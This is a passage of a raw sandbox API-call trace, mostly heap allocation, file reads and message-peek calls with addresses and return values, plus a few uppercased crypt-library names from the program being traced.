0x2e69c08 [0162.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0162.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0162.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0162.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0162.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0162.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0162.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x3de1020 [0162.153] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0162.153] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0162.158] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0162.160] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0xf600, lpOverlapped=0x0) returned 1 [0162.162] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0162.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0162.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0162.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0162.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0162.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2f600) returned 0x2f04008 [0162.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3de1020 | out: hHeap=0x970000) returned 1 [0162.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0162.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0162.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0162.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0162.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0162.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0162.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0162.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0162.169] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2f600) returned 0x2e80330 [0162.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0162.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0162.175] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0162.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0162.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0162.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0162.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0162.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0162.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2f600) returned 0x2f04008 [0162.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0162.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0162.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0162.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0162.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0162.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0162.175] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0162.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0162.175] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0162.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0162.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0162.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0162.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0162.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0162.176] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0162.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0162.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0162.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0162.176] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0162.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0162.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0162.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0162.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b68 [0162.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0162.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0162.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0162.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0162.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2f600) returned 0x2f04008 [0162.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0162.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b88 [0162.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0162.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0162.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0162.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bb8 [0162.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0162.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0162.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0162.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bc8 [0162.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0162.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0162.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0162.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50590 [0162.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0162.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0162.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0162.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0162.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0162.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2f600) returned 0x2eaf938 [0162.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0162.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0162.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0162.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0162.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0162.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0162.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0162.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0162.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0162.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0162.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0162.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0162.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0162.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0162.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0162.307] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0162.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0162.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0162.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0162.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0162.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0162.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0162.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0162.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0162.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0162.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0162.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0162.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0162.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0162.308] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0162.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0162.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0162.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0162.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0162.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0162.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0162.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0162.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0162.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0162.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0162.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0162.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0162.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0162.309] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0162.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0162.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0162.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0162.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0162.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0162.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0162.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0162.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0162.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0162.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0162.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0162.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0162.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0162.310] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0162.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0162.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0162.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0162.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0162.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0162.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0162.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0162.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0162.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0162.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0162.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0162.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0162.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0162.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0162.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0162.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0162.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0162.310] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0162.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0162.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0162.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0162.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0162.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0162.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0162.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0162.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0162.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0162.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0162.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0162.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0162.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0162.311] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0162.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0162.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0162.311] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0162.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0162.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0162.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0162.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0162.312] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0162.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0162.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fed8 [0162.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0162.312] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0162.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fed8 | out: hHeap=0x970000) returned 1 [0162.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0162.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0162.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0162.312] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0162.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0162.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0162.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0162.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0162.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0162.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0162.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0162.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0162.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0162.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0162.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0162.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0162.313] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0162.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0162.313] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0162.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe30 [0162.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0162.313] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0162.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe30 | out: hHeap=0x970000) returned 1 [0162.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0162.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0162.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0162.313] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0162.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0162.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0162.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0162.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0162.313] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0162.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0162.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0162.313] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0162.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0162.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0162.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0162.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0162.313] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0162.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0162.313] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0162.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0162.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0162.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0162.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0162.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0162.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0162.314] 